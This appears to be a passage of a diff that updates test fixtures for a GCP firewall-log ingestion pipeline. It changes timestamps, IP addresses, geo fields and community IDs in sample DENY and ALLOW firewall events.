"{\"insertId\":\"1dobeotg13df9f5\",\"jsonPayload\":{\"connection\":{\"dest_ip\":\"10.128.0.16\",\"dest_port\":80,\"protocol\":6,\"src_ip\":\"10.142.0.10\",\"src_port\":57794},\"disposition\":\"DENIED\",\"instance\":{\"project_id\":\"local-test\",\"region\":\"us-central1\",\"vm_name\":\"local-adrian-test\",\"zone\":\"us-central1-a\"},\"remote_instance\":{\"project_id\":\"remote-beats\",\"region\":\"us-east1\",\"vm_name\":\"test-es\",\"zone\":\"us-east1-b\"},\"remote_vpc\":{\"project_id\":\"remote-beats\",\"subnetwork_name\":\"mysubnet\",\"vpc_name\":\"default\"},\"rule_details\":{\"action\":\"DENY\",\"direction\":\"INGRESS\",\"ip_port_info\":[{\"ip_protocol\":\"TCP\",\"port_range\":[\"80\",\"8080\"]}],\"priority\":1000,\"reference\":\"network:default/firewall:adrian-test-3\",\"source_range\":[\"0.0.0.0/0\"],\"target_tag\":[\"adrian-test\"]},\"vpc\":{\"project_id\":\"test-beats\",\"subnetwork_name\":\"mysubnet\",\"vpc_name\":\"default\"}},\"logName\":\"projects/test-beats/logs/compute.googleapis.com%2Ffirewall\",\"receiveTimestamp\":\"2019-11-06T16:41:45.009675991Z\",\"resource\":{\"labels\":{\"location\":\"us-central1-a\",\"project_id\":\"test-beats\",\"subnetwork_id\":\"12345667\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-11-06T16:41:38.394575419Z\"}", "kind": "event", "action": "firewall-rule", @@ -201,7 +201,7 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.147368Z", + "ingested": "2021-12-09T13:37:43.705396900Z", "original": "{\"insertId\":\"1dobeotg13df9f7\",\"jsonPayload\":{\"connection\":{\"dest_ip\":\"10.128.0.10\",\"dest_port\":57794,\"protocol\":6,\"src_ip\":\"10.142.0.16\",\"src_port\":80},\"disposition\":\"DENIED\",\"instance\":{\"project_id\":\"local-test\",\"region\":\"us-central1\",\"vm_name\":\"local-adrian-test\",\"zone\":\"us-central1-a\"},\"remote_instance\":{\"project_id\":\"remote-beats\",\"region\":\"us-east1\",\"vm_name\":\"test-es\",\"zone\":\"us-east1-b\"},\"remote_vpc\":{\"project_id\":\"remote-beats\",\"subnetwork_name\":\"mysubnet\",\"vpc_name\":\"default\"},\"rule_details\":{\"action\":\"DENY\",\"direction\":\"EGRESS\",\"ip_port_info\":[{\"ip_protocol\":\"TCP\",\"port_range\":[\"80\",\"8080\"]}],\"priority\":1000,\"reference\":\"network:default/firewall:adrian-test-3\",\"source_range\":[\"0.0.0.0/0\"],\"target_tag\":[\"adrian-test\"]},\"vpc\":{\"project_id\":\"test-beats\",\"subnetwork_name\":\"mysubnet\",\"vpc_name\":\"default\"}},\"logName\":\"projects/test-beats/logs/compute.googleapis.com%2Ffirewall\",\"receiveTimestamp\":\"2019-11-06T16:41:45.009675991Z\",\"resource\":{\"labels\":{\"location\":\"us-central1-a\",\"project_id\":\"test-beats\",\"subnetwork_id\":\"892378332\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-11-06T16:41:38.394575419Z\"}", "kind": "event", "action": "firewall-rule", @@ -216,23 +216,12 @@ }, "destination": { "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "as": { - "number": 15169, - "organization": { - "name": "Google LLC" - } + "continent_name": "America", + "country_name": "usa" }, - "address": "8.8.8.8", + "address": "67.43.156.13", "port": 53, - "ip": "8.8.8.8" + "ip": "67.43.156.13" }, "rule": { "name": "network:default/firewall:adrian-test-1" @@ -248,7 +237,7 @@ ], "network": { "name": "default", - "community_id": "1:iiDdIEXnxwSiz/hJbVnseQ4SZVE=", + "community_id": "1:9+6dmqk1gTfOBuneEQYO+4ye504=", "transport": "udp", "type": "ipv4", "iana_number": "17", @@ -268,7 +257,7 @@ "related": { "ip": [ "10.128.0.16", - "8.8.8.8" + "67.43.156.13" ] }, "gcp": { @@ -304,8 +293,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.147374100Z", - "original": "{\"insertId\":\"4zuj4nfn4llkb\",\"jsonPayload\":{\"connection\":{\"dest_ip\":\"8.8.8.8\",\"dest_port\":53,\"protocol\":17,\"src_ip\":\"10.128.0.16\",\"src_port\":60094},\"disposition\":\"DENIED\",\"instance\":{\"project_id\":\"test-beats\",\"region\":\"us-central1\",\"vm_name\":\"adrian-test\",\"zone\":\"us-central1-a\"},\"remote_location\":{\"continent\":\"America\",\"country\":\"usa\"},\"rule_details\":{\"action\":\"DENY\",\"destination_range\":[\"8.8.8.0/24\"],\"direction\":\"EGRESS\",\"ip_port_info\":[{\"ip_protocol\":\"ALL\"}],\"priority\":1000,\"reference\":\"network:default/firewall:adrian-test-1\",\"target_tag\":[\"adrian-test\"]},\"vpc\":{\"project_id\":\"test-beats\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"}},\"logName\":\"projects/test-beats/logs/compute.googleapis.com%2Ffirewall\",\"receiveTimestamp\":\"2019-11-12T12:35:24.466374097Z\",\"resource\":{\"labels\":{\"location\":\"us-central1-a\",\"project_id\":\"test-beats\",\"subnetwork_id\":\"1266623735137648253\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-11-12T12:35:17.214711274Z\"}", + "ingested": "2021-12-09T13:37:43.705405800Z", + "original": "{\"insertId\":\"4zuj4nfn4llkb\",\"jsonPayload\":{\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":53,\"protocol\":17,\"src_ip\":\"10.128.0.16\",\"src_port\":60094},\"disposition\":\"DENIED\",\"instance\":{\"project_id\":\"test-beats\",\"region\":\"us-central1\",\"vm_name\":\"adrian-test\",\"zone\":\"us-central1-a\"},\"remote_location\":{\"continent\":\"America\",\"country\":\"usa\"},\"rule_details\":{\"action\":\"DENY\",\"destination_range\":[\"8.8.8.0/24\"],\"direction\":\"EGRESS\",\"ip_port_info\":[{\"ip_protocol\":\"ALL\"}],\"priority\":1000,\"reference\":\"network:default/firewall:adrian-test-1\",\"target_tag\":[\"adrian-test\"]},\"vpc\":{\"project_id\":\"test-beats\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"}},\"logName\":\"projects/test-beats/logs/compute.googleapis.com%2Ffirewall\",\"receiveTimestamp\":\"2019-11-12T12:35:24.466374097Z\",\"resource\":{\"labels\":{\"location\":\"us-central1-a\",\"project_id\":\"test-beats\",\"subnetwork_id\":\"1266623735137648253\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-11-12T12:35:17.214711274Z\"}", "kind": "event", "action": "firewall-rule", "id": "4zuj4nfn4llkb", @@ -331,16 +320,16 @@ "continent_name": "Asia", "country_name": "omn" }, - "address": "192.0.2.126", + "address": "192.168.2.126", "port": 64853, - "ip": "192.0.2.126" + "ip": "192.168.2.126" }, "tags": [ "preserve_original_event" ], "network": { "name": "windows-isolated", - "community_id": "1:I+YM7Ru3rl0RVZt/y+F/hkoY0Zc=", + "community_id": "1:OdLB9eXsBDLz8m97ao4LepX6q+4=", "transport": "tcp", "type": "ipv4", "iana_number": "6", @@ -359,7 +348,7 @@ }, "related": { "ip": [ - "192.0.2.126", + "192.168.2.126", "10.42.0.2" ] }, @@ -399,8 +388,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.147380200Z", - "original": "{\"insertId\":\"1f21ciqfpfssuo\",\"jsonPayload\":{\"connection\":{\"dest_ip\":\"10.42.0.2\",\"dest_port\":3389,\"protocol\":6,\"src_ip\":\"192.0.2.126\",\"src_port\":64853},\"disposition\":\"ALLOWED\",\"instance\":{\"project_id\":\"test-beats\",\"region\":\"us-east1\",\"vm_name\":\"test-windows\",\"zone\":\"us-east1-b\"},\"remote_location\":{\"continent\":\"Asia\",\"country\":\"omn\"},\"rule_details\":{\"action\":\"ALLOW\",\"direction\":\"INGRESS\",\"ip_port_info\":[{\"ip_protocol\":\"TCP\",\"port_range\":[\"3389\"]}],\"priority\":1000,\"reference\":\"network:windows-isolated/firewall:windows-isolated-allow-rdp\",\"source_range\":[\"0.0.0.0/0\"],\"target_tag\":[\"allow-rdp\"]},\"vpc\":{\"project_id\":\"test-beats\",\"subnetwork_name\":\"windows-isolated\",\"vpc_name\":\"windows-isolated\"}},\"logName\":\"projects/test-beats/logs/compute.googleapis.com%2Ffirewall\",\"receiveTimestamp\":\"2019-10-30T13:52:54.473174731Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"test-beats\",\"subnetwork_id\":\"3238409883146034900\",\"subnetwork_name\":\"windows-isolated\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-10-30T13:52:42.191988835Z\"}", + "ingested": "2021-12-09T13:37:43.705412100Z", + "original": "{\"insertId\":\"1f21ciqfpfssuo\",\"jsonPayload\":{\"connection\":{\"dest_ip\":\"10.42.0.2\",\"dest_port\":3389,\"protocol\":6,\"src_ip\":\"192.168.2.126\",\"src_port\":64853},\"disposition\":\"ALLOWED\",\"instance\":{\"project_id\":\"test-beats\",\"region\":\"us-east1\",\"vm_name\":\"test-windows\",\"zone\":\"us-east1-b\"},\"remote_location\":{\"continent\":\"Asia\",\"country\":\"omn\"},\"rule_details\":{\"action\":\"ALLOW\",\"direction\":\"INGRESS\",\"ip_port_info\":[{\"ip_protocol\":\"TCP\",\"port_range\":[\"3389\"]}],\"priority\":1000,\"reference\":\"network:windows-isolated/firewall:windows-isolated-allow-rdp\",\"source_range\":[\"0.0.0.0/0\"],\"target_tag\":[\"allow-rdp\"]},\"vpc\":{\"project_id\":\"test-beats\",\"subnetwork_name\":\"windows-isolated\",\"vpc_name\":\"windows-isolated\"}},\"logName\":\"projects/test-beats/logs/compute.googleapis.com%2Ffirewall\",\"receiveTimestamp\":\"2019-10-30T13:52:54.473174731Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"test-beats\",\"subnetwork_id\":\"3238409883146034900\",\"subnetwork_name\":\"windows-isolated\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-10-30T13:52:42.191988835Z\"}", "kind": "event", "action": "firewall-rule", "id": "1f21ciqfpfssuo", @@ -428,16 +417,16 @@ "city_name": "Krasnodar", "region_name": "Krasnodar Krai" }, - "address": "192.0.2.219", + "address": "192.168.2.219", "port": 2897, - "ip": "192.0.2.219" + "ip": "192.168.2.219" }, "tags": [ "preserve_original_event" ], "network": { "name": "default", - "community_id": "1:I0VuqgaYU1tgaECjlzIRuPzILlg=", + "community_id": "1:A5iOU96ubdRLq+4VydLZgZGU+Ns=", "transport": "tcp", "type": "ipv4", "iana_number": "6", @@ -456,7 +445,7 @@ }, "related": { "ip": [ - "192.0.2.219", + "192.168.2.219", "10.28.0.16" ] }, @@ -497,8 +486,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.147384600Z", - "original": "{\"insertId\":\"8vcfeailjd\",\"jsonPayload\":{\"connection\":{\"dest_ip\":\"10.28.0.16\",\"dest_port\":8080,\"protocol\":6,\"src_ip\":\"192.0.2.219\",\"src_port\":2897},\"disposition\":\"DENIED\",\"instance\":{\"project_id\":\"test-beats\",\"region\":\"us-central1\",\"vm_name\":\"adrian-test\",\"zone\":\"us-central1-a\"},\"remote_location\":{\"city\":\"Krasnodar\",\"continent\":\"Europe\",\"country\":\"rus\",\"region\":\"Krasnodar Krai\"},\"rule_details\":{\"action\":\"DENY\",\"direction\":\"INGRESS\",\"ip_port_info\":[{\"ip_protocol\":\"TCP\",\"port_range\":[\"80\",\"8080\"]}],\"priority\":1000,\"reference\":\"network:default/firewall:adrian-test-3\",\"source_range\":[\"0.0.0.0/0\"],\"target_tag\":[\"adrian-test\"]},\"vpc\":{\"project_id\":\"test-beats\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"}},\"logName\":\"projects/test-beats/logs/compute.googleapis.com%2Ffirewall\",\"receiveTimestamp\":\"2019-11-11T12:31:22.738796433Z\",\"resource\":{\"labels\":{\"location\":\"us-central1-a\",\"project_id\":\"test-beats\",\"subnetwork_id\":\"1266623735137648253\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-11-11T12:31:19.421478847Z\"}", + "ingested": "2021-12-09T13:37:43.705417200Z", + "original": "{\"insertId\":\"8vcfeailjd\",\"jsonPayload\":{\"connection\":{\"dest_ip\":\"10.28.0.16\",\"dest_port\":8080,\"protocol\":6,\"src_ip\":\"192.168.2.219\",\"src_port\":2897},\"disposition\":\"DENIED\",\"instance\":{\"project_id\":\"test-beats\",\"region\":\"us-central1\",\"vm_name\":\"adrian-test\",\"zone\":\"us-central1-a\"},\"remote_location\":{\"city\":\"Krasnodar\",\"continent\":\"Europe\",\"country\":\"rus\",\"region\":\"Krasnodar Krai\"},\"rule_details\":{\"action\":\"DENY\",\"direction\":\"INGRESS\",\"ip_port_info\":[{\"ip_protocol\":\"TCP\",\"port_range\":[\"80\",\"8080\"]}],\"priority\":1000,\"reference\":\"network:default/firewall:adrian-test-3\",\"source_range\":[\"0.0.0.0/0\"],\"target_tag\":[\"adrian-test\"]},\"vpc\":{\"project_id\":\"test-beats\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"}},\"logName\":\"projects/test-beats/logs/compute.googleapis.com%2Ffirewall\",\"receiveTimestamp\":\"2019-11-11T12:31:22.738796433Z\",\"resource\":{\"labels\":{\"location\":\"us-central1-a\",\"project_id\":\"test-beats\",\"subnetwork_id\":\"1266623735137648253\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-11-11T12:31:19.421478847Z\"}", "kind": "event", "action": "firewall-rule", "id": "8vcfeailjd", @@ -524,16 +513,16 @@ "continent_name": "Europe", "country_name": "deu" }, - "address": "192.0.2.14", + "address": "192.168.2.14", "port": 61000, - "ip": "192.0.2.14" + "ip": "192.168.2.14" }, "tags": [ "preserve_original_event" ], "network": { "name": "default", - "community_id": "1:JXppP0Oqm+g33JYC0DKoWKxP1GI=", + "community_id": "1:oI8iImLuHWwNxzRIIpsZbSUF2fE=", "transport": "tcp", "type": "ipv4", "iana_number": "6", @@ -552,7 +541,7 @@ }, "related": { "ip": [ - "192.0.2.14", + "192.168.2.14", "10.28.0.16" ] }, @@ -593,8 +582,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.147388800Z", - "original": "{\"insertId\":\"1bqgmw9feiabij\",\"jsonPayload\":{\"connection\":{\"dest_ip\":\"10.28.0.16\",\"dest_port\":80,\"protocol\":6,\"src_ip\":\"192.0.2.14\",\"src_port\":61000},\"disposition\":\"DENIED\",\"instance\":{\"project_id\":\"test-beats\",\"region\":\"us-central1\",\"vm_name\":\"adrian-test\",\"zone\":\"us-central1-a\"},\"remote_location\":{\"continent\":\"Europe\",\"country\":\"deu\"},\"rule_details\":{\"action\":\"DENY\",\"direction\":\"INGRESS\",\"ip_port_info\":[{\"ip_protocol\":\"TCP\",\"port_range\":[\"80\",\"8080\"]}],\"priority\":1000,\"reference\":\"network:default/firewall:adrian-test-3\",\"source_range\":[\"0.0.0.0/0\"],\"target_tag\":[\"adrian-test\"]},\"vpc\":{\"project_id\":\"test-beats\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"}},\"logName\":\"projects/test-beats/logs/compute.googleapis.com%2Ffirewall\",\"receiveTimestamp\":\"2019-11-11T12:41:35.727004321Z\",\"resource\":{\"labels\":{\"location\":\"us-central1-a\",\"project_id\":\"test-beats\",\"subnetwork_id\":\"1266623735137648253\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-11-11T12:41:31.079508196Z\"}", + "ingested": "2021-12-09T13:37:43.705423Z", + "original": "{\"insertId\":\"1bqgmw9feiabij\",\"jsonPayload\":{\"connection\":{\"dest_ip\":\"10.28.0.16\",\"dest_port\":80,\"protocol\":6,\"src_ip\":\"192.168.2.14\",\"src_port\":61000},\"disposition\":\"DENIED\",\"instance\":{\"project_id\":\"test-beats\",\"region\":\"us-central1\",\"vm_name\":\"adrian-test\",\"zone\":\"us-central1-a\"},\"remote_location\":{\"continent\":\"Europe\",\"country\":\"deu\"},\"rule_details\":{\"action\":\"DENY\",\"direction\":\"INGRESS\",\"ip_port_info\":[{\"ip_protocol\":\"TCP\",\"port_range\":[\"80\",\"8080\"]}],\"priority\":1000,\"reference\":\"network:default/firewall:adrian-test-3\",\"source_range\":[\"0.0.0.0/0\"],\"target_tag\":[\"adrian-test\"]},\"vpc\":{\"project_id\":\"test-beats\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"}},\"logName\":\"projects/test-beats/logs/compute.googleapis.com%2Ffirewall\",\"receiveTimestamp\":\"2019-11-11T12:41:35.727004321Z\",\"resource\":{\"labels\":{\"location\":\"us-central1-a\",\"project_id\":\"test-beats\",\"subnetwork_id\":\"1266623735137648253\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-11-11T12:41:31.079508196Z\"}", "kind": "event", "action": "firewall-rule", "id": "1bqgmw9feiabij", @@ -620,16 +609,16 @@ "continent_name": "Europe", "country_name": "deu" }, - "address": "192.0.2.14", + "address": "192.168.2.14", "port": 61000, - "ip": "192.0.2.14" + "ip": "192.168.2.14" }, "tags": [ "preserve_original_event" ], "network": { "name": "default", - "community_id": "1:JXppP0Oqm+g33JYC0DKoWKxP1GI=", + "community_id": "1:oI8iImLuHWwNxzRIIpsZbSUF2fE=", "transport": "tcp", "type": "ipv4", "iana_number": "6", @@ -648,7 +637,7 @@ }, "related": { "ip": [ - "192.0.2.14", + "192.168.2.14", "10.28.0.16" ] }, @@ -689,8 +678,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.147392800Z", - "original": "{\"insertId\":\"1jrxaqbfe48bir\",\"jsonPayload\":{\"connection\":{\"dest_ip\":\"10.28.0.16\",\"dest_port\":80,\"protocol\":6,\"src_ip\":\"192.0.2.14\",\"src_port\":61000},\"disposition\":\"DENIED\",\"instance\":{\"project_id\":\"test-beats\",\"region\":\"us-central1\",\"vm_name\":\"adrian-test\",\"zone\":\"us-central1-a\"},\"remote_location\":{\"continent\":\"Europe\",\"country\":\"deu\"},\"rule_details\":{\"action\":\"DENY\",\"direction\":\"INGRESS\",\"ip_port_info\":[{\"ip_protocol\":\"TCP\",\"port_range\":[\"80\",\"8080\"]}],\"priority\":1000,\"reference\":\"network:default/firewall:adrian-test-3\",\"source_range\":[\"0.0.0.0/0\"],\"target_tag\":[\"adrian-test\"]},\"vpc\":{\"project_id\":\"test-beats\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"}},\"logName\":\"projects/test-beats/logs/compute.googleapis.com%2Ffirewall\",\"receiveTimestamp\":\"2019-11-11T12:41:40.791816098Z\",\"resource\":{\"labels\":{\"location\":\"us-central1-a\",\"project_id\":\"test-beats\",\"subnetwork_id\":\"1266623735137648253\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-11-11T12:41:34.190831607Z\"}", + "ingested": "2021-12-09T13:37:43.705428700Z", + "original": "{\"insertId\":\"1jrxaqbfe48bir\",\"jsonPayload\":{\"connection\":{\"dest_ip\":\"10.28.0.16\",\"dest_port\":80,\"protocol\":6,\"src_ip\":\"192.168.2.14\",\"src_port\":61000},\"disposition\":\"DENIED\",\"instance\":{\"project_id\":\"test-beats\",\"region\":\"us-central1\",\"vm_name\":\"adrian-test\",\"zone\":\"us-central1-a\"},\"remote_location\":{\"continent\":\"Europe\",\"country\":\"deu\"},\"rule_details\":{\"action\":\"DENY\",\"direction\":\"INGRESS\",\"ip_port_info\":[{\"ip_protocol\":\"TCP\",\"port_range\":[\"80\",\"8080\"]}],\"priority\":1000,\"reference\":\"network:default/firewall:adrian-test-3\",\"source_range\":[\"0.0.0.0/0\"],\"target_tag\":[\"adrian-test\"]},\"vpc\":{\"project_id\":\"test-beats\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"}},\"logName\":\"projects/test-beats/logs/compute.googleapis.com%2Ffirewall\",\"receiveTimestamp\":\"2019-11-11T12:41:40.791816098Z\",\"resource\":{\"labels\":{\"location\":\"us-central1-a\",\"project_id\":\"test-beats\",\"subnetwork_id\":\"1266623735137648253\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-11-11T12:41:34.190831607Z\"}", "kind": "event", "action": "firewall-rule", "id": "1jrxaqbfe48bir", @@ -718,16 +707,16 @@ "city_name": "Berdychiv", "region_name": "Zhytomyr Oblast" }, - "address": "192.0.2.151", + "address": "192.168.2.151", "port": 62551, - "ip": "192.0.2.151" + "ip": "192.168.2.151" }, "tags": [ "preserve_original_event" ], "network": { "name": "default", - "community_id": "1:Us40G9GKff9nidizV7rCFgCQb9E=", + "community_id": "1:SKVztg1DPAOr3jK41SNPB1GNIVg=", "transport": "tcp", "type": "ipv4", "iana_number": "6", @@ -746,7 +735,7 @@ }, "related": { "ip": [ - "192.0.2.151", + "192.168.2.151", "10.28.0.16" ] }, @@ -787,8 +776,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.147396400Z", - "original": "{\"insertId\":\"1fw7drlfe2ty27\",\"jsonPayload\":{\"connection\":{\"dest_ip\":\"10.28.0.16\",\"dest_port\":8080,\"protocol\":6,\"src_ip\":\"192.0.2.151\",\"src_port\":62551},\"disposition\":\"DENIED\",\"instance\":{\"project_id\":\"test-beats\",\"region\":\"us-central1\",\"vm_name\":\"adrian-test\",\"zone\":\"us-central1-a\"},\"remote_location\":{\"city\":\"Berdychiv\",\"continent\":\"Europe\",\"country\":\"ukr\",\"region\":\"Zhytomyr Oblast\"},\"rule_details\":{\"action\":\"DENY\",\"direction\":\"INGRESS\",\"ip_port_info\":[{\"ip_protocol\":\"TCP\",\"port_range\":[\"80\",\"8080\"]}],\"priority\":1000,\"reference\":\"network:default/firewall:adrian-test-3\",\"source_range\":[\"0.0.0.0/0\"],\"target_tag\":[\"adrian-test\"]},\"vpc\":{\"project_id\":\"test-beats\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"}},\"logName\":\"projects/test-beats/logs/compute.googleapis.com%2Ffirewall\",\"receiveTimestamp\":\"2019-11-11T12:48:47.038820509Z\",\"resource\":{\"labels\":{\"location\":\"us-central1-a\",\"project_id\":\"test-beats\",\"subnetwork_id\":\"1266623735137648253\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-11-11T12:48:41.449552758Z\"}", + "ingested": "2021-12-09T13:37:43.705434Z", + "original": "{\"insertId\":\"1fw7drlfe2ty27\",\"jsonPayload\":{\"connection\":{\"dest_ip\":\"10.28.0.16\",\"dest_port\":8080,\"protocol\":6,\"src_ip\":\"192.168.2.151\",\"src_port\":62551},\"disposition\":\"DENIED\",\"instance\":{\"project_id\":\"test-beats\",\"region\":\"us-central1\",\"vm_name\":\"adrian-test\",\"zone\":\"us-central1-a\"},\"remote_location\":{\"city\":\"Berdychiv\",\"continent\":\"Europe\",\"country\":\"ukr\",\"region\":\"Zhytomyr Oblast\"},\"rule_details\":{\"action\":\"DENY\",\"direction\":\"INGRESS\",\"ip_port_info\":[{\"ip_protocol\":\"TCP\",\"port_range\":[\"80\",\"8080\"]}],\"priority\":1000,\"reference\":\"network:default/firewall:adrian-test-3\",\"source_range\":[\"0.0.0.0/0\"],\"target_tag\":[\"adrian-test\"]},\"vpc\":{\"project_id\":\"test-beats\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"}},\"logName\":\"projects/test-beats/logs/compute.googleapis.com%2Ffirewall\",\"receiveTimestamp\":\"2019-11-11T12:48:47.038820509Z\",\"resource\":{\"labels\":{\"location\":\"us-central1-a\",\"project_id\":\"test-beats\",\"subnetwork_id\":\"1266623735137648253\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-11-11T12:48:41.449552758Z\"}", "kind": "event", "action": "firewall-rule", "id": "1fw7drlfe2ty27", @@ -816,16 +805,16 @@ "city_name": "Vicenza", "region_name": "Veneto" }, - "address": "192.0.2.241", + "address": "192.168.2.241", "port": 44542, - "ip": "192.0.2.241" + "ip": "192.168.2.241" }, "tags": [ "preserve_original_event" ], "network": { "name": "default", - "community_id": "1:CKIvQ4W48ZjqiomnWxipDck9Yb0=", + "community_id": "1:Ju3t0rAM8ZPZaqr/NXVTm2rCcOQ=", "transport": "tcp", "type": "ipv4", "iana_number": "6", @@ -844,7 +833,7 @@ }, "related": { "ip": [ - "192.0.2.241", + "192.168.2.241", "10.28.0.16" ] }, @@ -885,8 +874,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.147422700Z", - "original": "{\"insertId\":\"1yre751fekaxzs\",\"jsonPayload\":{\"connection\":{\"dest_ip\":\"10.28.0.16\",\"dest_port\":8080,\"protocol\":6,\"src_ip\":\"192.0.2.241\",\"src_port\":44542},\"disposition\":\"DENIED\",\"instance\":{\"project_id\":\"test-beats\",\"region\":\"us-central1\",\"vm_name\":\"adrian-test\",\"zone\":\"us-central1-a\"},\"remote_location\":{\"city\":\"Vicenza\",\"continent\":\"Europe\",\"country\":\"ita\",\"region\":\"Veneto\"},\"rule_details\":{\"action\":\"DENY\",\"direction\":\"INGRESS\",\"ip_port_info\":[{\"ip_protocol\":\"TCP\",\"port_range\":[\"80\",\"8080\"]}],\"priority\":1000,\"reference\":\"network:default/firewall:adrian-test-3\",\"source_range\":[\"0.0.0.0/0\"],\"target_tag\":[\"adrian-test\"]},\"vpc\":{\"project_id\":\"test-beats\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"}},\"logName\":\"projects/test-beats/logs/compute.googleapis.com%2Ffirewall\",\"receiveTimestamp\":\"2019-11-11T13:10:30.804549999Z\",\"resource\":{\"labels\":{\"location\":\"us-central1-a\",\"project_id\":\"test-beats\",\"subnetwork_id\":\"1266623735137648253\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-11-11T13:10:24.214995318Z\"}", + "ingested": "2021-12-09T13:37:43.705438700Z", + "original": "{\"insertId\":\"1yre751fekaxzs\",\"jsonPayload\":{\"connection\":{\"dest_ip\":\"10.28.0.16\",\"dest_port\":8080,\"protocol\":6,\"src_ip\":\"192.168.2.241\",\"src_port\":44542},\"disposition\":\"DENIED\",\"instance\":{\"project_id\":\"test-beats\",\"region\":\"us-central1\",\"vm_name\":\"adrian-test\",\"zone\":\"us-central1-a\"},\"remote_location\":{\"city\":\"Vicenza\",\"continent\":\"Europe\",\"country\":\"ita\",\"region\":\"Veneto\"},\"rule_details\":{\"action\":\"DENY\",\"direction\":\"INGRESS\",\"ip_port_info\":[{\"ip_protocol\":\"TCP\",\"port_range\":[\"80\",\"8080\"]}],\"priority\":1000,\"reference\":\"network:default/firewall:adrian-test-3\",\"source_range\":[\"0.0.0.0/0\"],\"target_tag\":[\"adrian-test\"]},\"vpc\":{\"project_id\":\"test-beats\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"}},\"logName\":\"projects/test-beats/logs/compute.googleapis.com%2Ffirewall\",\"receiveTimestamp\":\"2019-11-11T13:10:30.804549999Z\",\"resource\":{\"labels\":{\"location\":\"us-central1-a\",\"project_id\":\"test-beats\",\"subnetwork_id\":\"1266623735137648253\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-11-11T13:10:24.214995318Z\"}", "kind": "event", "action": "firewall-rule", "id": "1yre751fekaxzs", @@ -914,16 +903,16 @@ "city_name": "Tula", "region_name": "Tula Oblast" }, - "address": "192.0.2.114", + "address": "192.168.2.114", "port": 41293, - "ip": "192.0.2.114" + "ip": "192.168.2.114" }, "tags": [ "preserve_original_event" ], "network": { "name": "default", - "community_id": "1:4MspX9JxDXjbalHc/6y9GntbkUc=", + "community_id": "1:3p2S4HNdJf2gfA2403VPmsMxi5E=", "transport": "tcp", "type": "ipv4", "iana_number": "6", @@ -942,7 +931,7 @@ }, "related": { "ip": [ - "192.0.2.114", + "192.168.2.114", "10.28.0.16" ] }, @@ -983,8 +972,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.147428700Z", - "original": "{\"insertId\":\"5kanfzfiqepkh\",\"jsonPayload\":{\"connection\":{\"dest_ip\":\"10.28.0.16\",\"dest_port\":80,\"protocol\":6,\"src_ip\":\"192.0.2.114\",\"src_port\":41293},\"disposition\":\"DENIED\",\"instance\":{\"project_id\":\"test-beats\",\"region\":\"us-central1\",\"vm_name\":\"adrian-test\",\"zone\":\"us-central1-a\"},\"remote_location\":{\"city\":\"Tula\",\"continent\":\"Europe\",\"country\":\"rus\",\"region\":\"Tula Oblast\"},\"rule_details\":{\"action\":\"DENY\",\"direction\":\"INGRESS\",\"ip_port_info\":[{\"ip_protocol\":\"TCP\",\"port_range\":[\"80\",\"8080\"]}],\"priority\":1000,\"reference\":\"network:default/firewall:adrian-test-3\",\"source_range\":[\"0.0.0.0/0\"],\"target_tag\":[\"adrian-test\"]},\"vpc\":{\"project_id\":\"test-beats\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"}},\"logName\":\"projects/test-beats/logs/compute.googleapis.com%2Ffirewall\",\"receiveTimestamp\":\"2019-11-11T13:35:28.934918322Z\",\"resource\":{\"labels\":{\"location\":\"us-central1-a\",\"project_id\":\"test-beats\",\"subnetwork_id\":\"1266623735137648253\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-11-11T13:35:23.504719962Z\"}", + "ingested": "2021-12-09T13:37:43.705444400Z", + 